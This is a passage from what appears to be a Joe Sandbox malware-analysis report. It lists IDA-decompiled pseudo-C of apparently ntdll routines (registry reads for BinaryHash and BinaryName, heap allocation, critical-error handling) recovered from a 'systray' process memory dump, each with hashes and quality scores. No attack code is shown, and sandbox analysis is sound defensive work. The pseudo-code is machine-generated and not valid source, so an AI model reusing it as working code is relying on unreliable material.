                                            				void* _t58;
                                            				signed short _t82;
                                            				short _t84;
                                            				signed int _t91;
                                            				signed int _t100;
                                            				signed short* _t103;
                                            				void* _t108;
                                            				intOrPtr* _t109;
                                            
                                            				_t103 = __ecx;
                                            				_t82 = __edx;
                                            				_t51 = E045B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                            				if(_t51 >= 0) {
                                            					_push(0x21);
                                            					_push(3);
                                            					_v56 =  *0x7ffe02dc;
                                            					_v20 =  &_v52;
                                            					_push( &_v44);
                                            					_v28 = 0x18;
                                            					_push( &_v28);
                                            					_push(0x100020);
                                            					_v24 = 0;
                                            					_push( &_v60);
                                            					_v16 = 0x40;
                                            					_v12 = 0;
                                            					_v8 = 0;
                                            					_t58 = E045D9830();
                                            					_t87 =  *[fs:0x30];
                                            					_t108 = _t58;
                                            					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                            					if(_t108 < 0) {
                                            						L11:
                                            						_t51 = _t108;
                                            					} else {
                                            						_push(4);
                                            						_push(8);
                                            						_push( &_v36);
                                            						_push( &_v44);
                                            						_push(_v60);
                                            						_t108 = E045D9990();
                                            						if(_t108 < 0) {
                                            							L10:
                                            							_push(_v60);
                                            							E045D95D0();
                                            							goto L11;
                                            						} else {
                                            							_t109 = L045B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                            							if(_t109 == 0) {
                                            								_t108 = 0xc0000017;
                                            								goto L10;
                                            							} else {
                                            								_t21 = _t109 + 0x18; // 0x18
                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                            								 *_t109 = 1;
                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                            								 *(_t109 + 0xe) = _t82;
                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                            								E045DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                            								_t91 =  *_t103 & 0x0000ffff;
                                            								_t100 = _t91 & 0xfffffffe;
                                            								_t84 = 0x5c;
                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                            										_push(_v60);
                                            										E045D95D0();
                                            										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                            										_t51 = 0xc0000106;
                                            									} else {
                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                            										goto L5;
                                            									}
                                            								} else {
                                            									L5:
                                            									 *_a4 = _t109;
                                            									_t51 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t51;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction ID: 82f21bca85423e0a54e827a83eab8144be05e6f4b33d00b642a0d1db369b1fee
                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction Fuzzy Hash: 01518D72604711AFD320DF59C840A6BBBF9FF88B14F008A2DF99587690E7B4E904DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E04613540(intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v88;
                                            				intOrPtr _v92;
                                            				char _v96;
                                            				char _v352;
                                            				char _v1072;
                                            				intOrPtr _v1140;
                                            				intOrPtr _v1148;
                                            				char _v1152;
                                            				char _v1156;
                                            				char _v1160;
                                            				char _v1164;
                                            				char _v1168;
                                            				char* _v1172;
                                            				short _v1174;
                                            				char _v1176;
                                            				char _v1180;
                                            				char _v1192;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				short _t41;
                                            				short _t42;
                                            				intOrPtr _t80;
                                            				intOrPtr _t81;
                                            				signed int _t82;
                                            				void* _t83;
                                            
                                            				_v12 =  *0x468d360 ^ _t82;
                                            				_t41 = 0x14;
                                            				_v1176 = _t41;
                                            				_t42 = 0x16;
                                            				_v1174 = _t42;
                                            				_v1164 = 0x100;
                                            				_v1172 = L"BinaryHash";
                                            				_t81 = E045D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                            				if(_t81 < 0) {
                                            					L11:
                                            					_t75 = _t81;
                                            					E04613706(0, _t81, _t79, _t80);
                                            					L12:
                                            					if(_a4 != 0xc000047f) {
                                            						E045DFA60( &_v1152, 0, 0x50);
                                            						_v1152 = 0x60c201e;
                                            						_v1148 = 1;
                                            						_v1140 = E04613540;
                                            						E045DFA60( &_v1072, 0, 0x2cc);
                                            						_push( &_v1072);
                                            						E045EDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                            						E04620C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                            						_push(_v1152);
                                            						_push(0xffffffff);
                                            						E045D97C0();
                                            					}
                                            					return E045DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                            				}
                                            				_t79 =  &_v352;
                                            				_t81 = E04613971(0, _a4,  &_v352,  &_v1156);
                                            				if(_t81 < 0) {
                                            					goto L11;
                                            				}
                                            				_t75 = _v1156;
                                            				_t79 =  &_v1160;
                                            				_t81 = E04613884(_v1156,  &_v1160,  &_v1168);
                                            				if(_t81 >= 0) {
                                            					_t80 = _v1160;
                                            					E045DFA60( &_v96, 0, 0x50);
                                            					_t83 = _t83 + 0xc;
                                            					_push( &_v1180);
                                            					_push(0x50);
                                            					_push( &_v96);
                                            					_push(2);
                                            					_push( &_v1176);
                                            					_push(_v1156);
                                            					_t81 = E045D9650();
                                            					if(_t81 >= 0) {
                                            						if(_v92 != 3 || _v88 == 0) {
                                            							_t81 = 0xc000090b;
                                            						}
                                            						if(_t81 >= 0) {
                                            							_t75 = _a4;
                                            							_t79 =  &_v352;
                                            							E04613787(_a4,  &_v352, _t80);
                                            						}
                                            					}
                                            					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                            				}
                                            				_push(_v1156);
                                            				E045D95D0();
                                            				if(_t81 >= 0) {
                                            					goto L12;
                                            				} else {
                                            					goto L11;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: BinaryHash
                                            • API String ID: 2994545307-2202222882
                                            • Opcode ID: a8059a5de2f49a4bfd8ebb0a13f9f252ca35098c5fe0f1a7325c6ed3a26c60da
                                            • Instruction ID: 256649d0854f5bda9e44f2a6cacb251a334f579ede67b327d853694a52eaaedb
                                            • Opcode Fuzzy Hash: a8059a5de2f49a4bfd8ebb0a13f9f252ca35098c5fe0f1a7325c6ed3a26c60da
                                            • Instruction Fuzzy Hash: 534126F1D0052D9BEB21DA54CC80FDEB77CAF44718F0445A5EA09A7250EB30AE88DF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E04613884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _v16;
                                            				char* _v20;
                                            				short _v22;
                                            				char _v24;
                                            				intOrPtr _t38;
                                            				short _t40;
                                            				short _t41;
                                            				void* _t44;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            
                                            				_v16 = __edx;
                                            				_t40 = 0x14;
                                            				_v24 = _t40;
                                            				_t41 = 0x16;
                                            				_v22 = _t41;
                                            				_t38 = 0;
                                            				_v12 = __ecx;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(2);
                                            				_t43 =  &_v24;
                                            				_v20 = L"BinaryName";
                                            				_push( &_v24);
                                            				_push(__ecx);
                                            				_t47 = 0;
                                            				_t48 = E045D9650();
                                            				if(_t48 >= 0) {
                                            					_t48 = 0xc000090b;
                                            				}
                                            				if(_t48 != 0xc0000023) {
                                            					_t44 = 0;
                                            					L13:
                                            					if(_t48 < 0) {
                                            						L16:
                                            						if(_t47 != 0) {
                                            							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                            						}
                                            						L18:
                                            						return _t48;
                                            					}
                                            					 *_v16 = _t38;
                                            					 *_a4 = _t47;
                                            					goto L18;
                                            				}
                                            				_t47 = L045B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				if(_t47 != 0) {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t47);
                                            					_push(2);
                                            					_push( &_v24);
                                            					_push(_v12);
                                            					_t48 = E045D9650();
                                            					if(_t48 < 0) {
                                            						_t44 = 0;
                                            						goto L16;
                                            					}
                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                            						_t48 = 0xc000090b;
                                            					}
                                            					_t44 = 0;
                                            					if(_t48 < 0) {
                                            						goto L16;
                                            					} else {
                                            						_t17 = _t47 + 0xc; // 0xc
                                            						_t38 = _t17;
                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                            							_t48 = 0xc000090b;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_t48 = _t48 + 0xfffffff4;
                                            				goto L18;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: BinaryName
                                            • API String ID: 2994545307-215506332
                                            • Opcode ID: b622d3803b10f52d7816d13f43da577c94247f790fd2c4a334392db1234b5910
                                            • Instruction ID: 55a4732194e5f268f3cf272ee14a0d6adac29de05de34bd15d2abaca988776a9
                                            • Opcode Fuzzy Hash: b622d3803b10f52d7816d13f43da577c94247f790fd2c4a334392db1234b5910
                                            • Instruction Fuzzy Hash: 5A31F17290050AAFFB25DE58C945EABB774FB80B20F054569ED16A7760F630BE80D7E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 33%
                                            			E045CD294(void* __ecx, char __edx, void* __eflags) {
                                            				signed int _v8;
                                            				char _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				intOrPtr _v64;
                                            				char* _v68;
                                            				intOrPtr _v72;
                                            				char _v76;
                                            				signed int _v84;
                                            				intOrPtr _v88;
                                            				char _v92;
                                            				intOrPtr _v96;
                                            				intOrPtr _v100;
                                            				char _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				char _t38;
                                            				signed int _t40;
                                            				signed int _t44;
                                            				signed int _t52;
                                            				void* _t53;
                                            				void* _t55;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t64;
                                            				signed int _t65;
                                            				signed int _t66;
                                            
                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x468d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                            				_v105 = __edx;
                                            				_push( &_v92);
                                            				_t52 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push( &_v104);
                                            				_push(0);
                                            				_t59 = __ecx;
                                            				_t55 = 2;
                                            				if(E045B4120(_t55, __ecx) < 0) {
                                            					_t35 = 0;
                                            					L8:
                                            					_pop(_t61);
                                            					_pop(_t64);
                                            					_pop(_t53);
                                            					return E045DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                            				}
                                            				_v96 = _v100;
                                            				_t38 = _v92;
                                            				if(_t38 != 0) {
                                            					_v104 = _t38;
                                            					_v100 = _v88;
                                            					_t40 = _v84;
                                            				} else {
                                            					_t40 = 0;
                                            				}
                                            				_v72 = _t40;
                                            				_v68 =  &_v104;
                                            				_push( &_v52);
                                            				_v76 = 0x18;
                                            				_push( &_v76);
                                            				_v64 = 0x40;
                                            				_v60 = _t52;
                                            				_v56 = _t52;
                                            				_t44 = E045D98D0();
                                            				_t62 = _v88;
                                            				_t65 = _t44;
                                            				if(_t62 != 0) {
                                            					asm("lock xadd [edi], eax");
                                            					if((_t44 | 0xffffffff) != 0) {
                                            						goto L4;
                                            					}
                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                            					E045D95D0();
                                            					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                            					goto L4;
                                            				} else {
                                            					L4:
                                            					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                            					if(_t65 >= 0) {
                                            						_t52 = 1;
                                            					} else {
                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                            						}
                                            					}
                                            					_t35 = _t52;
                                            					goto L8;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 51f9e49719f17723dabe1ffa3eba5fc4c5d14842e8fc0e6a844f5026d08f4b80
                                            • Instruction ID: 7d596a7b3892d642a2ba7ecd972ddb665ad3c78b5e6285de01816be7bc3b60d5
                                            • Opcode Fuzzy Hash: 51f9e49719f17723dabe1ffa3eba5fc4c5d14842e8fc0e6a844f5026d08f4b80
                                            • Instruction Fuzzy Hash: 223150B15087459FD321DF58D98096BBBF8FBC5A54F00092EB995C3250E638ED09EBD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E04648DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				void* _t41;
                                            
                                            				_t40 = __esi;
                                            				_t39 = __edi;
                                            				_t38 = __edx;
                                            				_t35 = __ecx;
                                            				_t34 = __ebx;
                                            				_push(0x74);
                                            				_push(0x4670d50);
                                            				E045ED0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                            					E04625720(0x65, 0, "Critical error detected %lx\n", _t35);
                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                            						asm("int3");
                                            						 *(_t41 - 4) = 0xfffffffe;
                                            					}
                                            				}
                                            				 *(_t41 - 4) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                            				 *((intOrPtr*)(_t41 - 0x64)) = L045EDEF0;
                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                            				_push(_t41 - 0x70);
                                            				L045EDEF0(1, _t38);
                                            				 *(_t41 - 4) = 0xfffffffe;
                                            				return E045ED130(_t34, _t39, _t40);
                                            			}

                                            Strings
                                            • Critical error detected %lx, xrefs: 04648E21
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: cdd7a5d66bab823e163680945bdc8c1ee7823fa83b00265ba95598d062709b8a
                                            • Instruction ID: 1306abdf63cac18fe1fb34ab3402a39a87fea3024428ed0f91c9211063631dba
                                            • Opcode Fuzzy Hash: cdd7a5d66bab823e163680945bdc8c1ee7823fa83b00265ba95598d062709b8a
                                            • Instruction Fuzzy Hash: BD11AD75D00349EBEF28EFA585057ECBBB0BB84714F24421ED429AB381E3346606DF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0462FF60
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1911121157
                                            • Opcode ID: ddec350cf2c139c0acb8977b371c3ee1bcba132fd8cb9dafbe2b82c71fd3e666
                                            • Instruction ID: 06ef7203ef63986ea9ddd70d7a6a379c8be11d938db5c27892341cdc1914d8be
                                            • Opcode Fuzzy Hash: ddec350cf2c139c0acb8977b371c3ee1bcba132fd8cb9dafbe2b82c71fd3e666
                                            • Instruction Fuzzy Hash: 3511E171950554FFEB1AEF50CA48FA87BB1FB48708F148048E5046B2A1E739B944EF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E04665BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int _t296;
                                            				signed char _t298;
                                            				signed int _t301;
                                            				signed int _t306;
                                            				signed int _t310;
                                            				signed char _t311;
                                            				intOrPtr _t312;
                                            				signed int _t313;
                                            				void* _t327;
                                            				signed int _t328;
                                            				intOrPtr _t329;
                                            				intOrPtr _t333;
                                            				signed char _t334;
                                            				signed int _t336;
                                            				void* _t339;
                                            				signed int _t340;
                                            				signed int _t356;
                                            				signed int _t362;
                                            				short _t367;
                                            				short _t368;
                                            				short _t373;
                                            				signed int _t380;
                                            				void* _t382;
                                            				short _t385;
                                            				signed short _t392;
                                            				signed char _t393;
                                            				signed int _t395;
                                            				signed char _t397;
                                            				signed int _t398;
                                            				signed short _t402;
                                            				void* _t406;
                                            				signed int _t412;
                                            				signed char _t414;
                                            				signed short _t416;
                                            				signed int _t421;
                                            				signed char _t427;
                                            				intOrPtr _t434;
                                            				signed char _t435;
                                            				signed int _t436;
                                            				signed int _t442;
                                            				signed int _t446;
                                            				signed int _t447;
                                            				signed int _t451;
                                            				signed int _t453;
                                            				signed int _t454;
                                            				signed int _t455;
                                            				intOrPtr _t456;
                                            				intOrPtr* _t457;
                                            				short _t458;
                                            				signed short _t462;
                                            				signed int _t469;
                                            				intOrPtr* _t474;
                                            				signed int _t475;
                                            				signed int _t479;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				short _t485;
                                            				signed int _t491;
                                            				signed int* _t494;
                                            				signed int _t498;
                                            				signed int _t505;
                                            				intOrPtr _t506;
                                            				signed short _t508;
                                            				signed int _t511;
                                            				void* _t517;
                                            				signed int _t519;
                                            				signed int _t522;
                                            				void* _t523;
                                            				signed int _t524;
                                            				void* _t528;
                                            				signed int _t529;
                                            
                                            				_push(0xd4);
                                            				_push(0x4671178);
                                            				E045ED0E8(__ebx, __edi, __esi);
                                            				_t494 = __edx;
                                            				 *(_t528 - 0xcc) = __edx;
                                            				_t511 = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                            				 *(_t528 - 0xbc) = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                            				_t427 = 0;
                                            				 *(_t528 - 0x74) = 0;
                                            				 *(_t528 - 0x9c) = 0;
                                            				 *(_t528 - 0x84) = 0;
                                            				 *(_t528 - 0xac) = 0;
                                            				 *(_t528 - 0x88) = 0;
                                            				 *(_t528 - 0xa8) = 0;
                                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                            				if( *(_t528 + 0x1c) <= 0x80) {
                                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                            					if(__eflags != 0) {
                                            						_t421 = E04664C56(0, __edx, __ecx, __eflags);
                                            						__eflags = _t421;
                                            						if(_t421 != 0) {
                                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                                            							E045DD000(0x410);
                                            							 *(_t528 - 0x18) = _t529;
                                            							 *(_t528 - 0x9c) = _t529;
                                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                            							E04665542(_t528 - 0x9c, _t528 - 0x84);
                                            						}
                                            					}
                                            					_t435 = _t427;
                                            					 *(_t528 - 0xd0) = _t435;
                                            					_t474 = _t511 + 0x65;
                                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            					_t511 = 0x18;
                                            					while(1) {
                                            						 *(_t528 - 0xa0) = _t427;
                                            						 *(_t528 - 0xbc) = _t427;
                                            						 *(_t528 - 0x80) = _t427;
                                            						 *(_t528 - 0x78) = 0x50;
                                            						 *(_t528 - 0x79) = _t427;
                                            						 *(_t528 - 0x7a) = _t427;
                                            						 *(_t528 - 0x8c) = _t427;
                                            						 *(_t528 - 0x98) = _t427;
                                            						 *(_t528 - 0x90) = _t427;
                                            						 *(_t528 - 0xb0) = _t427;
                                            						 *(_t528 - 0xb8) = _t427;
                                            						_t296 = 1 << _t435;
                                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                            						__eflags = _t436 & _t296;
                                            						if((_t436 & _t296) != 0) {
                                            							goto L92;
                                            						}
                                            						__eflags =  *((char*)(_t474 - 1));
                                            						if( *((char*)(_t474 - 1)) == 0) {
                                            							goto L92;
                                            						}
                                            						_t301 =  *_t474;
                                            						__eflags = _t494[1] - _t301;
                                            						if(_t494[1] <= _t301) {
                                            							L10:
                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                            								L12:
                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                            									goto L92;
                                            								}
                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                            									goto L92;
                                            								}
                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                            									goto L92;
                                            								}
                                            								L15:
                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                            								 *(_t528 - 0xc0) = _t306;
                                            								 *(_t528 - 0xa4) = _t306;
                                            								__eflags =  *0x46860e8;
                                            								if( *0x46860e8 != 0) {
                                            									__eflags = _t306 - 0x40;
                                            									if(_t306 < 0x40) {
                                            										L20:
                                            										asm("lock inc dword [eax]");
                                            										_t310 =  *0x46860e8; // 0x0
                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                            										__eflags = _t311 & 0x00000001;
                                            										if((_t311 & 0x00000001) == 0) {
                                            											 *(_t528 - 0xa0) = _t311;
                                            											_t475 = _t427;
                                            											 *(_t528 - 0x74) = _t427;
                                            											__eflags = _t475;
                                            											if(_t475 != 0) {
                                            												L91:
                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            												goto L92;
                                            											}
                                            											asm("sbb edi, edi");
                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                            											_t511 = _t498;
                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                            											__eflags =  *(_t312 - 5) & 1;
                                            											if(( *(_t312 - 5) & 1) != 0) {
                                            												_push(_t528 - 0x98);
                                            												_push(0x4c);
                                            												_push(_t528 - 0x70);
                                            												_push(1);
                                            												_push(0xfffffffa);
                                            												_t412 = E045D9710();
                                            												_t475 = _t427;
                                            												__eflags = _t412;
                                            												if(_t412 >= 0) {
                                            													_t414 =  *(_t528 - 0x98) - 8;
                                            													 *(_t528 - 0x98) = _t414;
                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                            													 *(_t528 - 0x8c) = _t416;
                                            													 *(_t528 - 0x79) = 1;
                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                            											__eflags = _t446 & 0x00000004;
                                            											if((_t446 & 0x00000004) != 0) {
                                            												__eflags =  *(_t528 - 0x9c);
                                            												if( *(_t528 - 0x9c) != 0) {
                                            													 *(_t528 - 0x7a) = 1;
                                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t313 = 2;
                                            											_t447 = _t446 & _t313;
                                            											__eflags = _t447;
                                            											 *(_t528 - 0xd4) = _t447;
                                            											if(_t447 != 0) {
                                            												_t406 = 0x10;
                                            												_t511 = _t511 + _t406;
                                            												__eflags = _t511;
                                            											}
                                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                            											 *(_t528 - 0x88) = _t427;
                                            											__eflags =  *(_t528 + 0x1c);
                                            											if( *(_t528 + 0x1c) <= 0) {
                                            												L45:
                                            												__eflags =  *(_t528 - 0xb0);
                                            												if( *(_t528 - 0xb0) != 0) {
                                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            													__eflags = _t511;
                                            												}
                                            												__eflags = _t475;
                                            												if(_t475 != 0) {
                                            													asm("lock dec dword [ecx+edx*8+0x4]");
                                            													goto L100;
                                            												} else {
                                            													_t494[3] = _t511;
                                            													_t451 =  *(_t528 - 0xa0);
                                            													_t427 = E045D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                            													 *(_t528 - 0x88) = _t427;
                                            													__eflags = _t427;
                                            													if(_t427 == 0) {
                                            														__eflags = _t511 - 0xfff8;
                                            														if(_t511 <= 0xfff8) {
                                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                            															asm("sbb ecx, ecx");
                                            															__eflags = (_t451 & 0x000000e2) + 8;
                                            														}
                                            														asm("lock dec dword [eax+edx*8+0x4]");
                                            														L100:
                                            														goto L101;
                                            													}
                                            													_t453 =  *(_t528 - 0xa0);
                                            													 *_t494 = _t453;
                                            													_t494[1] = _t427;
                                            													_t494[2] =  *(_t528 - 0xbc);
                                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x14);
